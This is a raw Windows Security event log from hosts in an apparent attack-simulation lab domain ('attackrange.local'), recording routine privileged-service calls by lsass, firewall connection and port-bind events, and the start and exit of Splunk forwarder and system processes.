RecordNumber=278842
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278841
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278840
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278839
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278838
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278837
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278836
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278835
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278834
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887237
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1271
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887236
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1271
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887235
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x10ac
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887234
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1270
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887233
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1270
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887232
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1269
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887231
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1269
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887230
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887229
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1268
Destination Address: 52.247.37.26
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887228
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1268
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887227
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55529
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887226
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887225
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887224
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887223
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1267
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887222
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1267
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887221
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 54143
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887220
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 61323
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887219
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 61323
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887218
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61323
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887217
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61323
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278888
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 57659
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278887
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::e939:94d:a3e8:982d
Source Port: 57659
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67346
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278886
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 57659
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278885
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 57659
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278884
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 56934
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278883
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::e939:94d:a3e8:982d
Source Port: 56934
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67346
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278882
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56934
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278881
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56934
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278880
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278879
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 58319
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278878
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58319
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278877
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58319
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278876
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 55007
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278875
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55007
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278874
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55007
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278873
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53912
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278872
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1780
Process Name: C:\Windows\System32\csrss.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278871
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x142c
New Process Name: C:\Windows\System32\dllhost.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
